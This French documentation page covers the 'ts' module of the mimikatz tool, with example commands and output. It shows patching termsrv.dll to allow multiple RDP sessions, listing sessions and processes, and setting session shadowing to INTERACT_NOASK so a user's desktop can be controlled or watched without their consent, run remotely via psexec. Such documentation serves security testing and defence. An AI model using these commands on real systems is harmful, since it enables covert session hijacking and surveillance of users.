mimikatz :: ts

ts

Les commandes de manipulation du Terminal Server

Méthodes :

multirdp

Description : Patch le service Terminal Server utilisé en mode bureau à distance pour dépasser le nombre de connexions simultanées
Arguments : n.a.
Remarques :

  • sous les version non serveur, il ne faut pas se connecter avec le même utilisateur dans différentes sessions
  • méthode très utile après avoir utilisé psexec -s \\machine mimikatz

Exemple : ts::multirdp

mimikatz # ts::multirdp
Service : Services Terminal Server
Recherche des patterns dans : termsrv.dll@pid(900)
Patch termsrv.dll@pid(900) : OK

sessions

Description : Affiche les sessions courantes
Arguments : nomServeur, si aucun le serveur local
Exemple : ts::sessions

mimikatz # ts::sessions
SessId  Etat    strEtat
    0       1   Connected       Console
65536       6   Listen          RDP-Tcp
    2       0   Active          RDP-Tcp#27

processes

Description : Affiche les processus du serveur
Arguments : nomServeur, si aucun le serveur local
Exemple : ts::processes windows-d.vm.nirvana.local

mimikatz # ts::processes windows-d.vm.nirvana.local
PID     SessId  Utilisateur
    0       0   n.a.
    4       0   AUTORITE NT\SYSTEM            System
  276       0   AUTORITE NT\SYSTEM            smss.exe
  324       0   AUTORITE NT\SYSTEM            csrss.exe
  348       0   AUTORITE NT\SYSTEM            winlogon.exe
  396       0   AUTORITE NT\SYSTEM            services.exe
  408       0   AUTORITE NT\SYSTEM            lsass.exe
  596       0   AUTORITE NT\SYSTEM            vmacthlp.exe
  640       0   AUTORITE NT\SYSTEM            svchost.exe
  696       0   AUTORITE NT\SERVICE RÉSEAU    svchost.exe
  752       0   AUTORITE NT\SERVICE RÉSEAU    svchost.exe
  788       0   AUTORITE NT\SERVICE LOCAL     svchost.exe
  820       0   AUTORITE NT\SYSTEM            svchost.exe
  972       0   AUTORITE NT\SYSTEM            spoolsv.exe
 1004       0   AUTORITE NT\SERVICE RÉSEAU    msdtc.exe
 1140       0   AUTORITE NT\SYSTEM            svchost.exe
 1224       0   AUTORITE NT\SERVICE LOCAL     svchost.exe
 1300       0   AUTORITE NT\SERVICE RÉSEAU    svchost.exe
 1348       0   AUTORITE NT\SERVICE RÉSEAU    svchost.exe
 1400       0   AUTORITE NT\SYSTEM            vmtoolsd.exe
 1540       0   AUTORITE NT\SYSTEM            svchost.exe
 1708       0   AUTORITE NT\SYSTEM            dllhost.exe
 2724       0   AUTORITE NT\SYSTEM            wmiprvse.exe
 2936       0   AUTORITE NT\SERVICE LOCAL     logon.scr
 3784       0   AUTORITE NT\SYSTEM            svchost.exe
 1936       0   AUTORITE NT\SYSTEM            RemoteExecService.exe
 2604       0   AUTORITE NT\SYSTEM            omtsreco.exe
 1964       0   AUTORITE NT\SYSTEM            TNSLSNR.EXE
 3344       0   AUTORITE NT\SYSTEM            oracle.exe
 3400       0   AUTORITE NT\SYSTEM            oravssw.exe
 3848       0   AUTORITE NT\SYSTEM            nmesrvc.exe
 3596       0   AUTORITE NT\SYSTEM            cmd.exe
 3528       0   AUTORITE NT\SYSTEM            perl.exe
 3996       0   AUTORITE NT\SYSTEM            cmd.exe
  308       0   AUTORITE NT\SYSTEM            java.exe
  844       0   AUTORITE NT\SYSTEM            emagent.exe
 3980       0   AUTORITE NT\SERVICE RÉSEAU    wmiprvse.exe
 3248       3   AUTORITE NT\SYSTEM            csrss.exe

viewshadow

Description : Affiche le paramétrage actif de prise de contrôle de sessions TS
Arguments : numSession, si aucun : toutes les sessions
Remarques :

  • Ne fonctionne que sous Windows XP et 2003 en x86 et x64
  • Est rarement utilisé depuis le poste lui même, plutôt via PsExec (avec -s), rendant le privilège DEBUG inutile

Exemple : ts::viewshadow

mimikatz # ts::viewshadow
@Winstation : 000B5BE8
        760C6B80 <-> 000BE0A0
        id     : 0
        name   : Console
        sname  : Console
        type   : wdcon
        shadow : 0 (DISABLE)

@Winstation : 000BE0A0
        000B5BE8 <-> 000C8FF0
        id     : 65536
        name   : RDP-Tcp
        sname  : Microsoft RDP 5.2
        type   : rdpwd
        shadow : 1 (INTERACT (confirmation))

@Winstation : 000C8FF0
        000BE0A0 <-> 760C6B80
        id     : 2
        name   : RDP-Tcp#27
        sname  : Microsoft RDP 5.2
        type   : rdpwd
        shadow : 1 (INTERACT (confirmation))

modifyshadow

Description : Modifie le paramétrage actif de prise de contrôle de sessions TS
Arguments : numSession controle
avec controle parmi :

  • DISABLE ; pas de contrôle autorisé
  • INTERACT ; interaction avec la session utilisateur, avec demande de son accord
  • INTERACT_NOASK ; interaction avec la session utilisateur
  • VIEW ; visibilité de la session utilisateur, avec demande de son accord
  • VIEW_NOASK ; visibilité de la session utilisateur

Remarques :

  • Ne fonctionne que sous Windows XP et 2003 en x86 et x64
  • Est rarement utilisé depuis le poste lui même, plutôt via PsExec (avec -s), rendant le privilège DEBUG inutile

Exemple : ts::modifyshadow 0 INTERACT_NOASK

mimikatz # ts::modifyshadow 0 INTERACT_NOASK
@Winstation : 000B5BE8
        760C6B80 <-> 000BE0A0
        id     : 0
        name   : Console
        sname  : Console
        type   : wdcon
        shadow : 0 (DISABLE)
              => 2 (INTERACT_NOASK) : OK

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>